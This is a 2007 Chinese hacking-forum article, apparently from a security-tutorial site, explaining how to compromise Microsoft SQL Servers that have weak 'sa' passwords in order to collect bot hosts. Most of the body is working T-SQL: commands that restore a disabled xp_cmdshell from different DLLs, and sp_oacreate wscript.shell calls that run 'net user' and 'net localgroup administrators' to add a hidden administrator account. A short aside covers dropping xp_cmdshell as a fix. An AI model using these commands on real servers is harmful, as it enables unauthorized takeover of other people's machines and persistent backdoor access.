利用SQL分离器实现sa弱口令入侵 _ 技术文章〓中国安全在线〓打造最优秀的新手成长第一起跑线!

执着成就未来技术成就梦想

新闻: 黑客新闻 IT新闻时事新闻站内新闻漏洞公告病毒公告代理公布论坛新闻安全新闻	论坛
文摘: 入侵攻击漏洞研究操作系统建站技术技巧知识网管天地菜鸟学习安全防护 QQ技巧	学习
软件: 扫描检测远程监控脚本注入拒绝攻击嗅探监听木马后门字典代理密码破解 QQ软件	下载
动画: 入侵动画木马教程漏洞利用加密破解软件应用ＱＱ动画综合教程黑客编程在线服务	动画

文字横幅以及760*60黄金广告位置招租,欢迎恰谈！　广告业务联系QQ:8019399　声明：在本站所投放广告内容均与本站立场无关！

首页 | 新闻 | 漏洞 | 防范 | QQ技巧 | 入侵 | 菜鸟 | 扫描 | 控制 | 后门 | QQ软件 | 注射 | 网管 | 编程 | 文学 | 教程 | 服务| 论坛

您现在的位置：中国安全在线 >> 攻防技术 >> 入侵攻击 >> 文章正文

用户登录

新用户注册

专题栏目

最新热门

最新推荐

相关文章

QQ好友是否在隐身?两种方法抓出来
防范黑客入侵的四大安全隐患
手动去除QQ2007广告的方法
黑客常用命令和快捷键
再谈oracle！isqlplus端口的妙用!
破解交换机密码全过程
QQ2007全新系统默认表情抢鲜下载
QQ密码找回指南新编带你快速找回Q
网管之路，敢问路在何方？
成为黑客的必备技能

利用SQL分离器实现sa弱口令入侵

作者：佚名来源：安全在线更新时间：2007-12-11 16:46:56 【字体：小大】
<%=(int(rnd()1)+1)%>您当前的位置：中国安全在线cnsafer.com　请进入[技术论坛]发表评论我自己现在找肉鸡主要是找SA弱口令肉鸡到还能找到几只，但也碰到不少困难，到处查资料总算找到点有用的。下面这些命令要SQL分离器才能实现，下面是一些关于sa弱口令相关命令。注：具体问题具体分析，以上方法仅供参考，不一定有效，相关原理知识请自行查找。一.更改sa口令方法：用sql综合利用工具连接后，执行命令：exec sp_password NULL,'新密码','sa' (提示：慎用!) 二.简单修补sa弱口令：方法1：查询分离器连接后执行： if exists (select from dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and OBJECTPROPERTY(id, N'IsExtendedProc') = 1) exec sp_dropextendedproc N'[dbo].[xp_cmdshell]' GO 然后按F5键命令执行完毕。方法2：查询分离器连接后第一步执行：use master，第二步执行：sp_dropextendedproc 'xp_cmdshell'，然后按F5键命令执行完毕。三.常见情况恢复执行xp_cmdshell： 1 未能找到存储过程'master..xpcmdshell'。恢复方法：查询分离器连接后，第一步执行：EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int，第二步执行：sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'，然后按F5键命令执行完毕。 2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一DLL。原因126（找不到指定模块。）恢复方法：查询分离器连接后，第一步执行：sp_dropextendedproc "xp_cmdshell"，第二步执行：sp_addextendedproc 'xp_cmdshell','xpsql70.dll' 然后按F5键命令执行完毕。 3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。) 恢复方法：查询分离器连接后, 第一步执行：exec sp_dropextendedproc 'xp_cmdshell' 第二步执行：exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 然后按F5键命令执行完毕。四.终极方法：如果以上方法均不可恢复，请尝试用下面的办法直接添加帐户：查询分离器连接后， 2000servser系统: declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户密码 /add' declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add' xp或2003server系统: declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户密码 /add' declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add' 您对本文章有什么意见或着疑问吗？请到论坛讨论您的关注和建议是我们前行的参考和动力
文章录入：ls1238 责任编辑：ls1238
	上一篇文章：对黑客风云网站的一次渗透经过下一篇文章：没有了
【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

网友评论：（只显示最新10条。评论内容只代表网友观点，与本站立场无关！）

| 设为首页 | 加入收藏 | 联系方式 | 友情链接 | 关于我们 | 网站留言 |

Copyright ?2003-2007 www.cnsafer.com All Rights Reserved.
如有意见请与我们联系　Email:admin#mail.cnsafer.com 联系QQ:8589101
友情提示：建议使用IE6.0版本, 分辩率1024*768进行浏览
中国安全在线敢想敢做挑战自我努力做最好
中网科技有限公司技术支持　鄂ICP备05006475号